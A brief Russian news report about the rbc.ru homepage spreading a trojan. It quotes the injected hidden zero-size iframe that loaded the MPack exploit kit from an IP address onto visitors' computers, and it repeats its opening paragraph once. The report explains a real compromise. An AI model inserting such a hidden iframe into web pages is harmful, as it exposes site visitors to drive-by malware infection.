Сайт Rbc.ru распространял опасный троян

image

Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.

Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели предупреждение антивируса о попытке заражения троянской программой.

При детальном анализе оказалось, что на главной странице сайта содержался код

<iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe> ,

загружающий на компьютер пользователя программу Mpack, которая используется для загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись несколько десятков тысяч пользователей сайта.


comments powered by Disqus